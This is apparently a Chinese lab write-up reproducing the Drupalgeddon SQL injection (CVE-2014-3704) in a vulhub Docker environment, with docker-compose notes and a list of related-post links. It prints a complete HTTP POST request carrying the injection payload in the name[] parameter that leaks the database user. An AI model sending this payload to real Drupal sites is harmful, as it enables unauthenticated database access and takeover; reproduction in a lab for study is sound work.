Drupal 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
声明
好好学习,天天向上
漏洞描述
Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
影响范围
7.0~7.31
复现过程
这里使用7.31版本
使用vulhub
/app/vulhub-master/drupal/CVE-2014-3704
使用docker启动
docker-compose build
docker-compose up -d
环境启动后,访问
http://192.168.239.129:8080
即可看到Drupal的安装页面,使用默认配置安装即可。
其中,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql:
安装完成后,抓包,修改为
POST /?q=node&destination=node HTTP/1.1
Host: 192.168.239.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down
Drupal 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)相关推荐
- Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
Drupal < 7.32 "Drupalgeddon" SQL注入漏洞 by ADummy 0x00利用路线 Burpsuite抓包改包->信息被爆出 0x01漏 ...
- Vulhub之“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
简介 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞.通过该漏洞,攻击者可以执行任意SQL语句,插入.修改管理员信息,甚至执行任意代码. 漏洞环境 进入对应 ...
- php cve-2014-8142漏洞,Drupal 7.31 SQL注入漏洞(CVE-2014-3704) EXP测试代码
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 最近频繁爆发各种0day,真是把大家累坏了.Drupal 7.31 SQL注入漏洞 ...
- Apache 'mod_accounting'模块SQL注入漏洞(CVE-2013-5697)
漏洞版本: mod_accounting 0.5 漏洞描述: BUGTRAQ ID: 62677 CVE ID: CVE-2013-5697mod_accounting是Apache 1.3.x上的流 ...
- guestbook.php注入,TinyGuestBook 'sign.php'多个SQL注入漏洞
发布日期:2012-09-23 更新日期:2012-10-04 受影响系统: TinyGuestBook TinyGuestBook 描述: ----------------------------- ...
- WordPress ProPlayer插件‘id’参数SQL注入漏洞
漏洞名称: WordPress ProPlayer插件'id'参数SQL注入漏洞 CNNVD编号: CNNVD-201305-468 发布时间: 2013-05-22 更新时间: 2013-05-22 ...
- 易想团购 注入 user.php,易想购物(easethink)存在sql注入漏洞,附利用测试POC
漏洞概要 缺陷编号:WooYun-2013-022023 漏洞标题:易想购物(easethink)存在sql注入漏洞,附利用测试POC 相关厂商:易想购物 漏洞作者:lxsec 提交时间:2013-0 ...
- 对搜狐 网易和TOM三大门户网站的SQL注入漏洞检测
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 对搜狐. ...
- Web安全之Sql注入漏洞
Sql注入漏洞 SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中后,被当作SQL语句的一部分执行. ...
最新文章
- linux挂载一个新的硬盘
- 英国萨里大学金耀初教授:进化计算在人工智能领域的发展
- Centos7.2源码安装redis
- x32dbg/x64dbg修改后如何保存到exe
- 弃用 Oracle!
- python中run函数作用_python3多线程中如何改写run()函数?
- Spark内核解析之一:内核概述
- 传入一个月份获取该月的统计信息
- Dxg——AD(Altium Designer) 开发笔记整理分类合集【所有的相关记录,都整理在此】
- java中vo_java中的vo是什么
- 2012年8月 至 2014年2月1日读书列表
- Vetur:Root file specified for compilation
- 光环《全脑思维下的敏捷产品构建》总结
- 十万,百万,千万,快狗打车架构是怎么演进的?
- GrayRhino轻松解锁卡贴机的越狱插件,不需要任何卡贴
- vue 活动倒计时组件
- Java初学01:学习路线,springcloud视频下载
- (二十五)各向同性张量(函数)
- 如何基于ffmpeg截取一段视频中的多个片段,并合并在一起,且不改变原来的效果?
- ubuntu16.04登录界面输入用户名密码后又回到登录界面